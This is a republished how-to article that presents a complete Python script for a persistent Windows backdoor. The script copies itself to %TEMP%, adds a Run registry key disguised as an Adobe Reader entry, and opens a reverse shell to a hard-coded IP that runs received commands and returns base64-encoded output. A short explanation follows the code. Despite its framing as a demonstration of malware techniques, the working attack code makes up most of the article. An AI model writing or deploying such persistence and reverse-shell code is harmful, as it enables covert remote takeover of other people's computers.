BestHub
Sign in
Information Security 6 min read

Create a Persistent Windows Reverse Shell with Python (Registry Run Key)

This article demonstrates how to use Python to copy a malicious executable to the %TEMP% directory, modify the Windows registry Run key for persistence, and establish a Base64‑encoded reverse shell that connects back to a hard‑coded attacker IP, illustrating common Windows malware techniques.

ITPUB
ITPUB
ITPUB
Create a Persistent Windows Reverse Shell with Python (Registry Run Key)

Malware often achieves persistence on Windows by modifying the HKLM\Software\Microsoft\Windows\CurrentVersion\Run registry key. The following Python script demonstrates how to copy an executable to the %TEMP% folder and add a Run‑key entry so the payload runs each time a user logs on.

import sys, base64, os, socket, subprocess
from _winreg import *

def autorun(tempdir, fileName, run):
    # Copy executable to %TEMP%
    os.system('copy %s %s' % (fileName, tempdir))
    # Query existing Run‑key values
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey = []
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass
    # Add our autorun entry if not present
    if 'Adobe ReaderX' not in runkey:
        try:
            key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_ALL_ACCESS)
            SetValueEx(key, 'Adobe_ReaderX', 0, REG_SZ, r"%TEMP%\\mw.exe")
            key.Close()
        except WindowsError:
            pass

def shell():
    # Base64‑encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', 443))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit": break
        proc = subprocess.Popen(data, shell=True,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE,
                                stdin=subprocess.PIPE)
        stdout_value = proc.stdout.read() + proc.stderr.read()
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
    s.close()

def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = r"Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    autorun(tempdir, fileName, run)
    shell()

if __name__ == "__main__":
    main()

The autorun function copies the running script to %TEMP%, enumerates existing Run‑key entries, and creates a new value named Adobe_ReaderX pointing to the copied executable. The shell function opens a TCP connection to the hard‑coded IP address 192.168.56.1 on port 443, receives commands, executes them, and returns the Base64‑encoded output, providing a stealthy reverse shell.

When the program is executed, Windows registers the payload for automatic start, and the reverse shell connects back to the attacker. The accompanying screenshot shows the program running on a Windows host and the Base64‑encoded network traffic.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

PersistenceWindowsRegistryreverse shell
ITPUB
Written by

ITPUB

Official ITPUB account sharing technical insights, community news, and exciting events.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment